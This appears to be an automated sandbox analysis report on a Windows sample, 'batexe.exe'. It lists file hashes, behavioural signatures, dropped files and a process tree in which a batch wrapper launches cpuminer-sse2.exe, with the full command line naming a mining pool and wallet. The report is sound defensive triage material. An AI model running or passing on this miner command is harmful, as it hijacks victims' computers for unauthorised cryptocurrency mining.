Analysis

  • max time kernel
    293s
  • max time network
    298s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
  • submitted
    24/02/2024, 05:13

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 6 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7E24.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3244
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3384

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe

          Filesize

          4.1MB

          MD5

          a8df8640272cc34f9b2abf1fb594b3df

          SHA1

          aafe75d4d714551577e01a6a5316df831c68608f

          SHA256

          f9d1fb833f78b3a9c0849524a8f96f26ce13148b48b2781272d0d04dbf55294b

          SHA512

          9a6e9aa1c4215183115766b7783a41028a6401f75e20be062b468452054033b542a0bbb8cdac666625c23c11a2daa4ca8c067feffd580eb38a30816fb5d44b14

        • C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe

          Filesize

          2.7MB

          MD5

          509805a244897438e485cde146619f97

          SHA1

          62aae1c934e4747a2f0615a2a77b57fd1ebb4c0a

          SHA256

          d4a45c1700ffdb8fc9118182e2e88ac5f84ac60a28e7ef70187ce3bd4e94a184

          SHA512

          a49b9f0d93587fb5f5ecdc4d6f1d174746c2537161fdfdc057b379bc1df418cdf60bfa0379261fda2f3518b94058dc2ae4b729d152e76b8d179113531f379fe0

        • C:\Users\Admin\AppData\Local\Temp\7133.tmp\b2e.exe

          Filesize

          2.1MB

          MD5

          91545cefa391acdd00973b81d01071b8

          SHA1

          faa4a7de02588cb96fed3b50e9fc85567851937d

          SHA256

          d7af5f42c26ad8a9030d15750752c705d650831f45411c2862c513bdd8562945

          SHA512

          bb9a71c5625731ef64cb38b9fb1be4c4a388bdc41cc880ad7c01797fb748e49e556225bffe709348d95c3b369539d5ecf0f3918f607171efc8d8140edc6faf0a

        • C:\Users\Admin\AppData\Local\Temp\7E24.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          455KB

          MD5

          f9fb93bf2ff5204a72fec0a2837b50d4

          SHA1

          b667882739dfc6a4b50f7d83f9174dc52a5f1ca8

          SHA256

          cffdc5cc73fa6bbe2d938a2be50563208c6d9d0b2d2218d9bbd2b1bb99f7d46c

          SHA512

          ed714cbe641fd7669b961179c398dbb2c43432076c0bbd6065285f8fed94fa26453cee3b139bbc55a3fbec42f65dd925973431d48b661b78c527b4bddaa128d1

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          549KB

          MD5

          a54737e3690fce4176b3a98ce0f3adde

          SHA1

          f7f2ba29540333b478b0d4bc52e27161e5d2230e

          SHA256

          abbfba0973651716b80c9c09ce6514d578219d6b03013f4441f76da31c4aa4de

          SHA512

          9dbcfc82afb8509d45d83818612748b1f35a4080f12051f1bd7a8179ec1eb9a740a26a01caaebb9686b1c865cc08b664253ed00bb15950e65f8db51d8ae7ca8a

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          130KB

          MD5

          8a1e211b6439ea4e7955b46528578a65

          SHA1

          649e6c2a3e2fcde6d6b14e976afb9dd63dfc6dba

          SHA256

          7ef71145b9c6477d01f95385bac1d602c9ca0082337b3897bba7fd9a4bf0ed77

          SHA512

          77b3c062525bef74b38ee8015bcfc5553b7c073978a6c050b6967aef3eb84cbf2570db88d5290c3d50bd51446d1a86febf179eb2f90f4db6cc54072b5b75aed4

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          284KB

          MD5

          23fcee68b90da8538d8daa54689c7c7d

          SHA1

          a081cc62118426eedf72792e27dcb38589150577

          SHA256

          00a199f8e280a5e89824ee7f64a51bf61770585f974d542863581e47cdcd4fc1

          SHA512

          c283d22f745f8a0365e04c93fc2626411fcfed275386916c7f590b9e07464224f8d74c9ab47a413298514edfe651e870d303d0489289f8e6f7238cc7c8ec34e4

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          204KB

          MD5

          4e5550a1b13f0de1d14794a02127fc06

          SHA1

          d14bca3d98e5cc7ef9ee6456d1eb6fdf39ebdccf

          SHA256

          058d6c685232999d708e5141cbb5f54cc79a9a5e1bf64703584a687c93fa7223

          SHA512

          25f58475c938406d666fa05f5aadf42edb5bb00524326c751abbf9f3791483d322c03a1317788740c136be1730f5cac949d54d7a940fbfab18a3cc19426ea09d

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          407KB

          MD5

          17d1111c58b02632f4cb552a5071bc26

          SHA1

          5fcb9a184429c4f921e2c2ea2dec80087f4a2559

          SHA256

          eede9802a763974c4c70adee92895e6a04e0130a05cb80d39a790831d25a9f38

          SHA512

          dcb284d484ba690f5853650e4b6f84a15bb8db4962dca2dccec2ddd8c1e0b0e0371813b670ef4c8c0fe306d4eeee4497b10343ffbcc5d911f6974dd117100b8c

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          172KB

          MD5

          24dd47034e90b9dc6931b1292381b238

          SHA1

          09bed945e2dc63098e9b29bcaef0676ef192028f

          SHA256

          9da8cbfbdc0c120a228d17d3be468fee73a2d4d9b2035802a20891676d5d22d7

          SHA512

          f7ccfd0e3e143025d850e7a4a7f1e9ec78065cb9f9be5dd23593e3d03e758885621e9b7ca24e84cfca21fe3cbe56d445412ccf074004a68b162850ad4e6f203d

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          201KB

          MD5

          29ef47de0336d06ac1f3a521e75bc74d

          SHA1

          ce7d850f27a005430415097e5761d9fb877cc87f

          SHA256

          8da90be810d8659372fc3a1f59f83319f0f9b60021288758c0eb8267656605f3

          SHA512

          044b412ab618365987542de23fd1e324198d0c7e89d511333a1c6632191ac88909ffd2ae63d81ff222ac5abb2929b9f2c03e8b296a7f6d54357e3263cec399d7

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          177KB

          MD5

          b3e1c338ed4ce068e2696ce3c7ebe22d

          SHA1

          5da1490bba7054500ef25f1160f410c0f3b3b9c6

          SHA256

          7e4a87834a6649c11d38056339a79cb07d67ef90e49614afea9e71ceba15a880

          SHA512

          17d5cda5eb7f13730f7d8a51deb925684fe43d41516a93bf13193b9eb94765aa86a7dd6f51af25c37401e34435c6a3711c492f3688a125ff7ba7737bd6b05ac0

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          217KB

          MD5

          e1c4dae37a95fb8d28ebea3b2f559c57

          SHA1

          a4bf3aa242b6b6c4332ff4992e890a2ecf41193a

          SHA256

          0962a82f9c6910c0998849a2be2c7e2f6a1dba84459d134f9e5abf03c536628e

          SHA512

          9f333a8a26e494202bcbf325a729d2102d7e624c6aafe43f596d7cdb933c4df030a3b86e52306237e6c8eae57f32768d43be495a7a15d99270f70d250a4cee37

        • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/64-9-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/3384-49-0x00000000744D0000-0x0000000074568000-memory.dmp

          Filesize

          608KB

        • memory/3384-66-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-45-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

          Filesize

          24.7MB

        • memory/3384-47-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/3384-48-0x0000000000870000-0x000000000092C000-memory.dmp

          Filesize

          752KB

        • memory/3384-42-0x0000000000870000-0x000000000092C000-memory.dmp

          Filesize

          752KB

        • memory/3384-101-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-61-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-96-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-71-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-76-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-81-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-86-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3384-91-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4680-7-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/4680-55-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB